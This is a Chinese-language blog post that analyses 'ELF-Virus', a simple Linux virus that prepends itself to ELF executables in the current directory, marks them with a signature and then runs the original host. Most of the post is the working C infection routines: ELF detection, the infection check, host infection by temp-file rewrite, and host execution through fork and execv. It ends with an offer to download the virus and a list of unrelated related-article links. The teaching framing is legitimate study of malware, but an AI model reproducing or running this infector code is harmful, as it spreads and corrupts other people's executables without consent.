系统功能概述

ELF-Virus实现了一个简单的病毒程序,能够感染当前目录下的ELF格式的可执行文件。病毒程序通过将自身代码附加到目标文件中,并在文件末尾添加一个特定的签名来标记文件已被感染。感染后的文件在执行时,会先执行病毒代码,然后再执行原始的程序代码。

系统架构

病毒程序:

病毒程序本身是一个ELF格式的可执行文件,它通过检查当前目录下的其他ELF文件,选择未被感染的文件进行感染。

感染机制:

病毒程序通过将自身代码附加到目标文件的末尾,并在文件末尾添加一个特定的签名(SIGNATURE)来标记文件已被感染。

执行机制:

感染后的文件在执行时,会先执行病毒代码,然后再执行原始的程序代码。

主要核心技术点

ELF文件识别:

病毒程序通过读取文件的前4个字节来判断文件是否为ELF格式。ELF文件的前4个字节为0x7f, 'E', 'L', 'F'。

  bool isELF(char* fileName) {

      if(fileName[0] == '.') return false;

      int hfd = open(fileName, O_RDONLY);

      char header[4];

      read(hfd, header, 4);

      close(hfd);

      return header[0] == 0x7f

          && header[1] == 'E'

          && header[2] == 'L'

          && header[3] == 'F';

  }

感染检测:

病毒程序通过检查文件末尾的签名来判断文件是否已被感染。

   bool isClean(char* fileName) {

       int signature;

       int fd = open(fileName, O_RDONLY);

       lseek(fd, -1 * sizeof(signature), SEEK_END);

       read(fd, &signature, sizeof(signature));

       close(fd);

       return signature != SIGNATURE;

   }

文件感染:

病毒程序通过创建一个临时文件,将病毒代码、原始文件内容和签名依次写入临时文件,然后将临时文件重命名为原始文件名,完成感染过程。

   void infectHostFile(char* hostFileName, int vfd) {

       int hfd = open(hostFileName, O_RDONLY);

       struct stat st;

       fstat(hfd, &st);

       int hostSize = st.st_size;

       int signature = SIGNATURE;

       int tfd = creat(TEMP_FILENAME, st.st_mode);

       sendfile(tfd, vfd, NULL, SIZE);

       sendfile(tfd, hfd, NULL, hostSize);

       write(tfd, &signature, sizeof(signature));

       rename(TEMP_FILENAME, hostFileName);

       close(tfd);

       close(hfd);

   }

执行原始程序:

感染后的文件在执行时,会先执行病毒代码,然后再执行原始的程序代码。

void executeHostPart(int vfd, mode_t mode, int totalSize, char *argv[]) {

       int tfd = creat(TEMP_FILENAME, mode);

       lseek(vfd, SIZE, SEEK_SET);

       int signatureSize = sizeof(SIGNATURE);

       int hostSize = totalSize - SIZE - signatureSize;

       sendfile(tfd, vfd, NULL, hostSize);

       close(tfd);

       pid_t pid = fork();

       if(pid == 0) {

           execv(TEMP_FILENAME, argv);

       }

       else{

           waitpid(pid, NULL, 0);

           unlink(TEMP_FILENAME);

       }

   }

应用场景

ELF-Virus主要用于研究和理解病毒程序的基本工作原理,以及如何通过代码实现文件的感染和执行。它可以用于教学目的,帮助学习者理解恶意软件的基本工作机制。

系统总结

ELF-Virus程序通过简单的文件操作和ELF文件格式的识别,实现了对目标文件的感染。感染后的文件在执行时会先执行病毒代码,然后再执行原始的程序代码。该程序展示了病毒程序的基本工作原理,具有一定的教育意义,但同时也提醒我们注意计算机安全,防止恶意软件的传播和感染。

需要ELF-Virus分析的朋友可以在公众号回复"ELF-Virus"进行下载

ELF-Virus简易病毒程序分析的更多相关文章

  1. Mac App 破解之路八 病毒程序分析

    本人使用MacBooster 7 扫出了几个未知程序. JMJ56 这个程序. 在finder中打开发现是一个shell脚本 调用了python 9NKb0 就是python脚本使用.    只不过是 ...

  2. 鸿蒙内核源码分析(ELF格式篇) | 应用程序入口并不是main | 百篇博客分析OpenHarmony源码 | v51.04

    百篇博客系列篇.本篇为: v51.xx 鸿蒙内核源码分析(ELF格式篇) | 应用程序入口并不是main | 51.c.h.o 加载运行相关篇为: v51.xx 鸿蒙内核源码分析(ELF格式篇) | ...

  3. Virus:病毒查杀

    简介 小伙伴们,大家好,今天分享一次Linux系统杀毒的经历,还有个人的一些总结,希望对大家有用. 这次遇到的是一个挖矿的病毒,在挖一种叫门罗币(XMR)的数字货币,行情走势请看 https://ww ...

  4. Linux程序分析工具:ldd和nm

    ldd和nm是Linux下两个非常实用的程序分析工具.其中,ldd是用来分析程序运行时需要依赖的动态链接库的工具,nm是用来查看指定程序中的符号表信息的工具. 1 ldd 格式:ldd [option ...

  5. Android版本的"Wannacry"文件加密病毒样本分析(附带锁机)

    一.前言 之前一个Wannacry病毒样本在PC端肆意了很久,就是RSA加密文件,勒索钱财.不给钱就删除.但是现在移动设备如此之多,就有一些不法分子想把这个病毒扩散到移动设备了,这几天一个哥们给了一个 ...

  6. Watchbog挖矿病毒程序排查过程

    第1章 情况 1)服务器收到cpu报警,cpu被占用达到100%,登录服务器查看,发现cpu被一个watchbog的进程占满了,如下图所示: 2)并且无论如何都杀不掉,用kill杀掉后,其还是会隔一会 ...

  7. [转] 一个U盘病毒简单分析

    (转自:一个U盘病毒简单分析 - 瑞星网   原文日期:2014.03.25) U盘这个移动存储设备由于体积小.容量大.便于携带等优点,给人们的存储数据带来了很大的便利.但正是由于这种便利,也给病毒有 ...

  8. 一个DDOS病毒的分析(一)

    一.基本信息 样本名称:Rub.EXE 样本大小:21504 字节 病毒名称:Trojan.Win32.Rootkit.hv 加壳情况:UPX(3.07) 样本MD5:035C1ADA4BACE78D ...

  9. House_Of_Spirit ctf oreo程序分析

    oreo程序下载 提取码:t4xx 程序分析 int __cdecl main() { leave_add = 0; leave_del = 0; leave_buf = (char *)&u ...

  10. C语言之简易了解程序环境

    C语言之简易了解程序环境 大纲: 程序的翻译环境 预编译 编译 汇编 链接 程序的运行环境 在ANSI C的任何一种实现中,存在两个不同的环境. 第1种是翻译环境,在这个环境中源代码被转换为可执行的机 ...

随机推荐

  1. w3cschool-微信小程序开发文档-云开发

    微信小程序云开发 介绍 2020-07-24 16:19 更新 开发者可以使用云开发开发微信小程序.小游戏,无需搭建服务器,即可使用云端能力. 云开发为开发者提供完整的原生云端支持和微信服务支持,弱化 ...

  2. C 国家名字按字母顺序排序

    问题 输入五个国家的名字,并按字母的顺序排列输出 分析 知识点 strcpy(1,2):将字符串2复制到字符数组1中    strcmp(1,2):比较字符串大小 二维数组 代码 #include & ...

  3. 远程连接Windows

    远程桌面连接 限制 1.同网段 (1)服务器关闭防火墙 (2)服务器端 右键点击'我的电脑'进入'属性'点击左侧菜单栏中的'远程设置': 把远程桌面选项设置成'允许运行任意版本远程桌面的计算机连接'. ...

  4. Sybaris pg walkthrough Intermediate 从redis 到 rce

    nmap ┌──(root㉿kali)-[~/lab] └─# nmap -p- -A 192.168.166.93 Starting Nmap 7.94SVN ( https://nmap.org ...

  5. linxu7下安装pacemaker+corosync集群-01

    1.yum仓库的配置-自行配置 2.安装软件包: yum -y install pacemaker* corosync* pcs* psmisc yum -y install pcs fence-ag ...

  6. Codeforces 1749E Cactus Wall 题解 [ 紫 ] [ 01 BFS ] [ 图论建模 ] [ 构造 ] [ adhoc ]

    一道很好的思维题,被教练碾压了. 观察 首先从题目给的样例入手: 5 5 ..... ..... ..... ..... ..... 这种情况最终的答案是: YES ....# ...#. ..#.. ...

  7. RabbitMQ(五)——发布订阅模式

    RabbitMQ系列 RabbitMQ(一)--简介 RabbitMQ(二)--模式类型 RabbitMQ(三)--简单模式 RabbitMQ(四)--工作队列模式 RabbitMQ(五)--发布订阅 ...

  8. linux的使用(2)

    1,覆盖 > cat 文件名a>文件名b:将文档a覆盖文档b 2,追加 >> cat 文档名a>>文档名b:将文档a追加到文档b后 追加错误 上图所示:尽量使用字母 ...

  9. 自助式BI:灵活应变的商业智能

    在这个信息爆炸的时代,商业智能(BI)已经成为企业决策的必备工具.无论是哪个行业,哪个规模的企业,似乎都无法忽视这一强大工具的存在.然而,传统的BI模式往往存在着一些限制,使得企业无法灵活地应对各种业 ...

  10. Java中编译期异常和运行期异常的区别

    在Java中,异常分为运行期异常(Runtime Exception)和编译期异常(Checked Exception),两者的核心区别在于 编译器是否强制要求处理.以下是它们的详细对比: 1. 定义 ...